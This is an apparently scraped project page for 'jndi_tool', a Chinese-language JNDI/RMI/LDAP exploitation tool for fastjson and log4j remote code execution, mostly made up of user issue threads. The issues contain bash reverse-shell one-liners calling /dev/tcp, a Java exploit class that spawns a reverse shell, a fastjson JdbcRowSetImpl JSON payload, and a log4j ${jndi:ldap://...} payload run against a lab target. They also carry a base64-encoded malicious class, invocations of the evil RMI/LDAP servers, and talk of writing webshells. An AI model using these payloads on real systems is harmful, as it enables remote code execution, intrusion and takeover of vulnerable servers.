wyzxxz / jndi_tool Goto Github PK
View Code? Open in Web Editor NEWJNDI服务利用工具 RMI/LDAP,支持部分场景回显、内存shell,高版本JDK场景下利用等,fastjson rce命令执行,log4j rce命令执行 漏洞检测辅助工具
jndi_tool's People
Contributors
Stargazers
Watchers
Forkers
jrdw0 hope075 bravery9 sry309 1979139113 yizhimanpadewoniu f8syw5v alilangtest thinkergod attackgithub heartway j1anfen evi1hack uuic 1337g aaeolus h1d3r nnewkin do0dl3 shimizukawasaki rainism tomandjarry lovecppp forks-library crackercat hacker-one lilc1 lp008 menthol1024 ameg-yag tr33-he11 r0bbit slowmistio b0han711 wllidr kyhvedn 0x09al doge-dog futurebody yeshuibo bigbrobro facetimewocx yogistudio t3st0r-git pyking abdilahrf laowang1026 zhoufjr yuxiaoyou123 1ik3 icysun thelostworldfree xiaoshuier wangbadada xizhimen m3g4byt3 gcxtx 1f3lse cs4745 m1y3 mmg1 test123test111 latentgod changwei0708 3tern4l ykankaya r4b3rt selfevo pt001 greatspider135 kong-f jimmyji wifido fanyibo2009 jasonlou camexp kangd1w2 sslvtao rookiebrother ethancck gold1029 wang0098 shenliehuozhi zzhacked freefv underwood12 pumaxiaoyao muzai 404tk crj0b betsy0 sung3r akira-09 uunoob monopole-zh fstac lily110 wuyoukm error996 richard6666jndi_tool's Issues
开放下载
HW结束了,开放下载
怎么删啦
1.4.x版的fastjson能打吗?
1.4.x版的fastjson能打吗?
java 1.8.242
使用您的jar包无法在linux执行bash -i >&/dev/tcp/x.x.x.x/80 0>&1
当我启用RMI或者LDAP后:
java -cp fastjson_tool.jar fastjson.HRMIServer 1.1.1.1 8888 "bash -i >&/dev/tcp/x.x.x.x/80 0>&1"
RMI服务显示有请求,但是nc端没有连接。当我使用其他Payload时,可以进行反弹,例如:
import java.io.BufferedReader;
import java.io.InputStream;
import java.io.InputStreamReader;
public class Exploit{
public Exploit() throws Exception {
Process p = Runtime.getRuntime().exec(new String[]{"bash", "-c", "bash -i >& /dev/tcp/x.x.x.x/80 0>&1"});
InputStream is = p.getInputStream();
BufferedReader reader = new BufferedReader(new InputStreamReader(is));
String line;
while((line = reader.readLine()) != null) {
System.out.println(line);
}
p.waitFor();
is.close();
reader.close();
p.destroy();
}
public static void main(String[] args) throws Exception {
}
}
由于您的工具已经打成了jar我,我无法分析查看。故提此issuse
师傅,下载链接失效了
打开download_url : https://toolaffix.oss-cn-beijing.aliyuncs.com/jndi_tool.zip 后直接返回oss报错界面
This XML file does not appear to have any style information associated with it. The document tree is shown below. <Error> <Code>NoSuchKey</Code> <Message>The specified key does not exist.</Message> <RequestId>61BACA8B99F00D313870123A</RequestId> <HostId>toolaffix.oss-cn-beijing.aliyuncs.com</HostId> <Key>jndi_tool.zip</Key> </Error>
写shell成功了,但是返回错误,是不是马子问题,能否自定义
小白问一下
执行命令:java -cp jndi_tool.jar jndi.EvilRMIServer 8888 1099 "curl dnslog.wyzxxz.cn" el-win/el-linux/groovy
Exception in thread "main" java.lang.IllegalAccessError: class jndi.EvilRMIServer (in unnamed module @0x19e1023e) cannot access class com.sun.jndi.rmi.registry.ReferenceWrapper (in module jdk.naming.rmi) because module jdk.naming.rmi does not export com.sun.jndi.rmi.registry to unnamed module @0x19e1023e
at jndi.EvilRMIServer.main(EvilRMIServer.java:114)
你们运行的JDK版本多少,我1.8的,漏洞复现不了
ECHO NOT FIND问题
我在执行jndi.fastjson.LDAPRefServerAuto 时存在可用类,但是显示ECHO NOT FIND,执行命令时没有回显要怎么解决?
为什么请求dnslog
为什么这里要请求dnslog.wyzxxz.cn
运行没提示了吗
我记得之前运行ldap或者rmi的时候 会提示fastjson的payload的 现在好像没了
base64 code
// jdk8\jdk7\jdk6
String []a={"Q","M","I"};
String szCode="yv66vgAAAD"+a[I]+"AHAoABgAPCgAQABEIABIKABAAEwcAFAcAFQEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBAApFeGNlcHRpb25zBwAWAQAKU291cmNlRmlsZQEAC09iamVjdC5qYXZhDAAHAAgHABcMABgAGQEADHBheWxvYWRfY29kZQwAGgAbAQAGT2JqZWN0AQAQamF2YS9sYW5nL09iamVjdAEAE2phdmEvbGFuZy9FeGNlcHRpb24BABFqYXZhL2xhbmcvUnVudGltZQEACmdldFJ1bnRpbWUBABUoKUxqYXZhL2xhbmcvUnVudGltZTsBAARleGVjAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1Byb2Nlc3M7ACEABQAGAAAAAAABAAEABwAIAAIACQAAAC4AAgABAAAADiq3AAG4AAISA7YABFexAAAAAQAKAAAADgADAAAABQAEAAYADQAHAAsAAAAEAAEADAABAA0AAAACAA4="
Log4j 靶场漏洞检测失败
Log4j 靶场漏洞检测失败
[root@VM-8-12-centos JNDIExploit]# java -cp JNDIExploit.jar jndi.log4j.HLDAPLog4j 82.156.13.32 8088 "whoami" http://d63bb2586.lab.aqlab.cn/
[-] LDAP Listening on 0.0.0.0:8088
[-] payload: ${jndi:ldap://82.156.13.32:8088/xobject}
[-] start exploit. waiting...
[-] exploit fail and exit.
[root@VM-8-12-centos JNDIExploit]# java -cp JNDIExploit.jar jndi.log4j.HLDAPLog4j 82.156.13.32 8088 "whoami" http://d63bb2586.lab.aqlab.cn/
[-] LDAP Listening on 0.0.0.0:8088
[-] payload: ${jndi:ldap://82.156.13.32:8088/xobject}
[-] start exploit. waiting...
[-] exploit fail and exit.
找不到类
师傅您好,使用这条命令
java -cp fastjson_tool.jar fastjson.LDAPRefServer2 1099 CommonsCollections1 "curl dnslog.cn"
会提示
“Error: Could not find or load main class fastjson.LDAPRefServer2”
后门后没有
后门有没?
LDAPRefServerAuto报错
url 和post_data初始化为空 如果命令行
java -cp fastjson_tool.jar fastjson.LDAPRefServerAuto 127.0.0.1 1099 file=filename 这条命令肯定报错
not find __PAYLOAD__ in request.
我填充了 说找不到
Tamper能不能增加urlencode
有些情况下需要对payload进行urlencode
关于反弹shell的问题
vps: java -cp fastjson_tool.jar HLDAPServer localhost 1099 "bash -i >& /dev/tcp/vps/8080 0>&1"
{"e":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"f":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://4xxx:1099/Object","autoCommit":true}}
可以执行命令,反弹的时候没收到请求,请教一下师傅
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google ❤️ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.